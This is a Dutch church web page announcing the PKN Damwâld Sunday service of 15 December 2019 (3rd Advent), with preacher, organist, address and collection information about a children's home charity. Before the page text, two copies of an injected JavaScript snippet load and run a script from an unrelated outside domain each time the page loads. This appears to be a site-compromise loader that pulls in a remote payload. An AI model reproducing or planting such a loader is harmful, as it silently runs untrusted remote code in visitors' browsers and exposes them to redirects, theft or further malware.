;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 15 december 2019 9:30 uur - PKN Damwâld
zondag 15 december 2019
09:30 uur

Kerkdienst zondag 15 december 2019 9:30 uur

Thema: 3e Advent

Informatie

Voorganger:Ds. S. Boukes
Organist:Johanna van der Weide
Thema:3e Advent
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Een stabiel thuis voor kinderen

Kinderen in de Knel - Een stabiel thuis voor kinderen
In Nederland kunnen door allerlei problemen 45.000 kinderen niet meer thuis wonen. In Jeugddorp De Glind worden 120 kinderen en jongeren opgevangen in een gezinshuis. In de Glind gaat men uit van de helende kracht van het gewone gezinsleven. Een gezinshuis wordt gerund door ouders die er vierentwintig uur per dag en zeven dagen per week zijn. Het biedt kinderen structuur, continuïteit in zorg en veiligheid binnen de omgeving in een bestaan gezin. Daar kunnen ze werken aan hun toekomst! Met de opbrengst wil Kerk in Actie kinderen in Nederland licht op hun pad brengen, op weg naar een goede toekomst.

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris